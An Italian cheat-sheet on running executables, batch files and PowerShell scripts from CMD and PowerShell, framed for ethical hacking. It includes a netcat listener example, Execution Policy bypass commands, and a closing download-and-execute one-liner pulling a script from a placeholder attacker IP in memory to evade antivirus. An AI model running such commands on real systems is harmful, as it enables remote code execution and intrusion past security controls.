tags: Windows_Eseguire_Comandi Esecuzione_Programmi_Windows
Esecuzione programmi .exe
CMD
C:\percorso>programma.exe
#Se non sei nella cartella:
C:\> "C:\percorso\del\programma\doprogramma.exe"
#Con argomenti:
C:\> "C:\Tools\nc64.exe" -lvnp 4444
Se il percorso contiene spazi, mettilo tra virgolette.
Powershell
PS C:\percorso> .\doprogramma.exe
# oppure semplicemente
PS C:\percorso> doprogramma.exe
#Con argomenti
PS C:\> & "C:\Tools\nc64.exe" -lvnp 4444
File .bat e .cmd (script per CMD)
CMD
C:\percorso> script.bat
#Se non sei nella cartella:
C:\> "C:\percorso\script.bat"
Powershell
PS C:\percorso> .\script.bat
# oppure
PS C:\> & "C:\percorso\script.bat"
File .ps1 (script PowerShell)
PS C:\percorso> .\script.ps1
#Oppure se non si è nella cartella:
PS C:\> & "C:\Users\me\Desktop\script.ps1"
Problema classico: Execution Policy
Quando provi ad avviare uno script .ps1, vedi spesso:
“running scripts is disabled on this system”
È la Execution Policy di PowerShell.
Per risolvere possiamo utilizzare:
#Per eseguire un singolo comando in modo usa:
powershell -ExecutionPolicy Bypass -File script.ps1
#Oppure tramite alias:
powershell -ep bypass -File .\script.ps1
#Da CMD per eseguire uno script PowerShell:
C:\> powershell -ExecutionPolicy Bypass -File "C:\percorso\script.ps1"
Metodo “In-Memory” (Stealth):
Spesso in ethical hacking non si scarica il file .ps1 su disco per eseguirlo, ma lo si scarica ed esegue direttamente in memoria per evitare l’antivirus.
IEX (New-Object Net.WebClient).DownloadString('http://<IP_ATTACCANTE>/script.ps1')